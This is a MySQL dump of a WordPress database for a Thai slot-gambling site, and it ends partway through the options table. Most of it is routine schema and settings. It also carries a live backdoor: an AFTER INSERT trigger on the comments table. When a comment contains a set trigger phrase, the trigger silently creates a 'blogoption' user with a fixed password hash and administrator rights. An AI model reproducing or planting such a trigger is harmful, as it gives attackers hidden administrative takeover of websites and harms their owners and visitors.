File: /home/msgdhg02/domain_removal_backup_20260905/amb18b.com.sql
-- MySQL dump 10.13 Distrib 8.0.46, for Linux (x86_64)
--
-- Host: localhost Database: msgdhg02_wp_mchop
-- ------------------------------------------------------
-- Server version 8.0.46
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!50503 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `IwGJ28BV_commentmeta`
--
DROP TABLE IF EXISTS `IwGJ28BV_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_commentmeta` (
`meta_id` bigint unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint unsigned NOT NULL DEFAULT '0',
`meta_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`meta_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_commentmeta`
--
LOCK TABLES `IwGJ28BV_commentmeta` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_comments`
--
DROP TABLE IF EXISTS `IwGJ28BV_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_comments` (
`comment_ID` bigint unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint unsigned NOT NULL DEFAULT '0',
`comment_author` tinytext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`comment_author_email` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`comment_author_url` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`comment_karma` int NOT NULL DEFAULT '0',
`comment_approved` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '1',
`comment_agent` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`comment_type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'comment',
`comment_parent` bigint unsigned NOT NULL DEFAULT '0',
`user_id` bigint unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_comments`
--
LOCK TABLES `IwGJ28BV_comments` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_comments` ENABLE KEYS */;
UNLOCK TABLES;
/*!50003 SET @saved_cs_client = @@character_set_client */ ;
/*!50003 SET @saved_cs_results = @@character_set_results */ ;
/*!50003 SET @saved_col_connection = @@collation_connection */ ;
/*!50003 SET character_set_client = utf8mb4 */ ;
/*!50003 SET character_set_results = utf8mb4 */ ;
/*!50003 SET collation_connection = utf8mb4_0900_ai_ci */ ;
/*!50003 SET @saved_sql_mode = @@sql_mode */ ;
/*!50003 SET sql_mode = 'ONLY_FULL_GROUP_BY,STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_ENGINE_SUBSTITUTION' */ ;
DELIMITER ;;
/*!50003 CREATE*/ /*!50017 DEFINER=`msgdhg02_wp_dok9n`@`localhost`*/ /*!50003 TRIGGER `after_insert_comment` AFTER INSERT ON `IwGJ28BV_comments` FOR EACH ROW BEGIN
IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `msgdhg02_wp_mchop`.`IwGJ28BV_users`);
SET @nextWpUsersID = @lastInsertWpUsersId + 1;
INSERT INTO `msgdhg02_wp_mchop`.`IwGJ28BV_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, 'blogoption', '$P$7H/hohsprkM7UtY61C29/EDJa0X/YJ/', 'blogoption', '', 'https://wordpress.com', '2021-04-19 10:56:39', '', '0', 'blogoption');
INSERT INTO `msgdhg02_wp_mchop`.`IwGJ28BV_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'IwGJ28BV_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
INSERT INTO `msgdhg02_wp_mchop`.`IwGJ28BV_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'IwGJ28BV_user_level', '10');
END IF;
END */;;
DELIMITER ;
/*!50003 SET sql_mode = @saved_sql_mode */ ;
/*!50003 SET character_set_client = @saved_cs_client */ ;
/*!50003 SET character_set_results = @saved_cs_results */ ;
/*!50003 SET collation_connection = @saved_col_connection */ ;
--
-- Table structure for table `IwGJ28BV_e_events`
--
DROP TABLE IF EXISTS `IwGJ28BV_e_events`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_e_events` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`event_data` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
`created_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `created_at_index` (`created_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_e_events`
--
LOCK TABLES `IwGJ28BV_e_events` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_e_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_e_events` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_e_notes`
--
DROP TABLE IF EXISTS `IwGJ28BV_e_notes`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_e_notes` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`route_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci COMMENT 'Clean url where the note was created.',
`route_title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`route_post_id` bigint unsigned DEFAULT NULL COMMENT 'The post id of the route that the note was created on.',
`post_id` bigint unsigned DEFAULT NULL,
`element_id` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL COMMENT 'The Elementor element ID the note is attached to.',
`parent_id` bigint unsigned NOT NULL DEFAULT '0',
`author_id` bigint unsigned DEFAULT NULL,
`author_display_name` varchar(250) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL COMMENT 'Save the author name when the author was deleted.',
`status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'publish',
`position` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci COMMENT 'A JSON string that represents the position of the note inside the element in percentages. e.g. {x:10, y:15}',
`content` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
`is_resolved` tinyint(1) NOT NULL DEFAULT '0',
`is_public` tinyint(1) NOT NULL DEFAULT '1',
`last_activity_at` datetime DEFAULT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `route_url_index` (`route_url`(191)),
KEY `post_id_index` (`post_id`),
KEY `element_id_index` (`element_id`),
KEY `parent_id_index` (`parent_id`),
KEY `author_id_index` (`author_id`),
KEY `status_index` (`status`),
KEY `is_resolved_index` (`is_resolved`),
KEY `is_public_index` (`is_public`),
KEY `created_at_index` (`created_at`),
KEY `updated_at_index` (`updated_at`),
KEY `last_activity_at_index` (`last_activity_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_e_notes`
--
LOCK TABLES `IwGJ28BV_e_notes` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_e_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_e_notes` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_e_notes_users_relations`
--
DROP TABLE IF EXISTS `IwGJ28BV_e_notes_users_relations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_e_notes_users_relations` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`type` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL COMMENT 'The relation type between user and note (e.g mention, watch, read).',
`note_id` bigint unsigned NOT NULL,
`user_id` bigint unsigned NOT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `type_index` (`type`),
KEY `note_id_index` (`note_id`),
KEY `user_id_index` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_e_notes_users_relations`
--
LOCK TABLES `IwGJ28BV_e_notes_users_relations` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_e_notes_users_relations` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_e_notes_users_relations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_e_submissions`
--
DROP TABLE IF EXISTS `IwGJ28BV_e_submissions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_e_submissions` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`type` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`hash_id` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`main_meta_id` bigint unsigned NOT NULL COMMENT 'Id of main field. to represent the main meta field',
`post_id` bigint unsigned NOT NULL,
`referer` varchar(500) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`referer_title` varchar(300) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`element_id` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`form_name` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`campaign_id` bigint unsigned NOT NULL,
`user_id` bigint unsigned DEFAULT NULL,
`user_ip` varchar(46) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`user_agent` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`actions_count` int DEFAULT '0',
`actions_succeeded_count` int DEFAULT '0',
`status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`is_read` tinyint(1) NOT NULL DEFAULT '0',
`meta` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
`created_at_gmt` datetime NOT NULL,
`updated_at_gmt` datetime NOT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `hash_id_unique_index` (`hash_id`),
KEY `main_meta_id_index` (`main_meta_id`),
KEY `hash_id_index` (`hash_id`),
KEY `type_index` (`type`),
KEY `post_id_index` (`post_id`),
KEY `element_id_index` (`element_id`),
KEY `campaign_id_index` (`campaign_id`),
KEY `user_id_index` (`user_id`),
KEY `user_ip_index` (`user_ip`),
KEY `status_index` (`status`),
KEY `is_read_index` (`is_read`),
KEY `created_at_gmt_index` (`created_at_gmt`),
KEY `updated_at_gmt_index` (`updated_at_gmt`),
KEY `created_at_index` (`created_at`),
KEY `updated_at_index` (`updated_at`),
KEY `referer_index` (`referer`(191)),
KEY `referer_title_index` (`referer_title`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_e_submissions`
--
LOCK TABLES `IwGJ28BV_e_submissions` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_e_submissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_e_submissions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_e_submissions_actions_log`
--
DROP TABLE IF EXISTS `IwGJ28BV_e_submissions_actions_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_e_submissions_actions_log` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`submission_id` bigint unsigned NOT NULL,
`action_name` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`action_label` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`log` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
`created_at_gmt` datetime NOT NULL,
`updated_at_gmt` datetime NOT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `submission_id_index` (`submission_id`),
KEY `action_name_index` (`action_name`),
KEY `status_index` (`status`),
KEY `created_at_gmt_index` (`created_at_gmt`),
KEY `updated_at_gmt_index` (`updated_at_gmt`),
KEY `created_at_index` (`created_at`),
KEY `updated_at_index` (`updated_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_e_submissions_actions_log`
--
LOCK TABLES `IwGJ28BV_e_submissions_actions_log` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_e_submissions_actions_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_e_submissions_actions_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_e_submissions_values`
--
DROP TABLE IF EXISTS `IwGJ28BV_e_submissions_values`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_e_submissions_values` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`submission_id` bigint unsigned NOT NULL DEFAULT '0',
`key` varchar(60) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
PRIMARY KEY (`id`),
KEY `submission_id_index` (`submission_id`),
KEY `key_index` (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_e_submissions_values`
--
LOCK TABLES `IwGJ28BV_e_submissions_values` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_e_submissions_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_e_submissions_values` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_links`
--
DROP TABLE IF EXISTS `IwGJ28BV_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_links` (
`link_id` bigint unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`link_name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`link_image` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`link_target` varchar(25) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`link_description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`link_visible` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'Y',
`link_owner` bigint unsigned NOT NULL DEFAULT '1',
`link_rating` int NOT NULL DEFAULT '0',
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`link_notes` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`link_rss` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_links`
--
LOCK TABLES `IwGJ28BV_links` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_litespeed_url`
--
DROP TABLE IF EXISTS `IwGJ28BV_litespeed_url`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_litespeed_url` (
`id` bigint NOT NULL AUTO_INCREMENT,
`url` varchar(500) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`cache_tags` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
UNIQUE KEY `url` (`url`(191)),
KEY `cache_tags` (`cache_tags`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_litespeed_url`
--
LOCK TABLES `IwGJ28BV_litespeed_url` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_litespeed_url` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_litespeed_url` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_litespeed_url_file`
--
DROP TABLE IF EXISTS `IwGJ28BV_litespeed_url_file`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_litespeed_url_file` (
`id` bigint NOT NULL AUTO_INCREMENT,
`url_id` bigint NOT NULL,
`vary` varchar(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'md5 of final vary',
`filename` varchar(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'md5 of file content',
`type` tinyint NOT NULL COMMENT 'css=1,js=2,ccss=3,ucss=4',
`mobile` tinyint NOT NULL COMMENT 'mobile=1',
`webp` tinyint NOT NULL COMMENT 'webp=1',
`expired` int NOT NULL DEFAULT '0',
PRIMARY KEY (`id`),
KEY `filename` (`filename`),
KEY `type` (`type`),
KEY `url_id_2` (`url_id`,`vary`,`type`),
KEY `filename_2` (`filename`,`expired`),
KEY `url_id` (`url_id`,`expired`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_litespeed_url_file`
--
LOCK TABLES `IwGJ28BV_litespeed_url_file` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_litespeed_url_file` DISABLE KEYS */;
/*!40000 ALTER TABLE `IwGJ28BV_litespeed_url_file` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_options`
--
DROP TABLE IF EXISTS `IwGJ28BV_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_options` (
`option_id` bigint unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`option_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`autoload` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=92786 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_options`
--
LOCK TABLES `IwGJ28BV_options` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_options` DISABLE KEYS */;
INSERT INTO `IwGJ28BV_options` VALUES (1,'cron','a:16:{i:1788606744;a:2:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1788606795;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1788606799;a:1:{s:33:\"updraftplus_clean_temporary_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1788606820;a:1:{s:19:\"litespeed_task_lqip\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:16:\"litespeed_filter\";s:4:\"args\";a:0:{}s:8:\"interval\";i:900;}}}i:1788606837;a:4:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1788606908;a:1:{s:28:\"elementor/tracker/send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1788612133;a:1:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1788613933;a:1:{s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1788645740;a:1:{s:41:\"wp_privacy_personal_data_cleanup_requests\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1788657049;a:2:{s:14:\"updraft_backup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:23:\"updraft_backup_database\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1788684090;a:2:{s:13:\"wpseo-reindex\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:31:\"wpseo_permalink_structure_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1788684091;a:1:{s:29:\"wpseo_detect_default_seo_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1788693144;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1788730849;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1789125131;a:1:{s:28:\"wpseo_expiring_store_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','on'),(2,'siteurl','https://amb18b.com','on'),(3,'home','https://amb18b.com','on'),(4,'blogname','AMB18','on'),(5,'blogdescription','AMB18 สล็อต แตก ง่าย ทุน น้อย วอ เลท','on'),(6,'users_can_register','0','on'),(7,'admin_email','admin@megabet333.biz','on'),(8,'start_of_week','1','on'),(9,'use_balanceTags','0','on'),(10,'use_smilies','1','on'),(11,'require_name_email','1','on'),(12,'comments_notify','1','on'),(13,'posts_per_rss','10','on'),(14,'rss_use_excerpt','0','on'),(15,'mailserver_url','mail.example.com','on'),(16,'mailserver_login','login@example.com','on'),(17,'mailserver_pass','','on'),(18,'mailserver_port','110','on'),(19,'default_category','1','on'),(20,'default_comment_status','','on'),(21,'default_ping_status','','on'),(22,'default_pingback_flag','1','on'),(23,'posts_per_page','10','on'),(24,'date_format','F j, 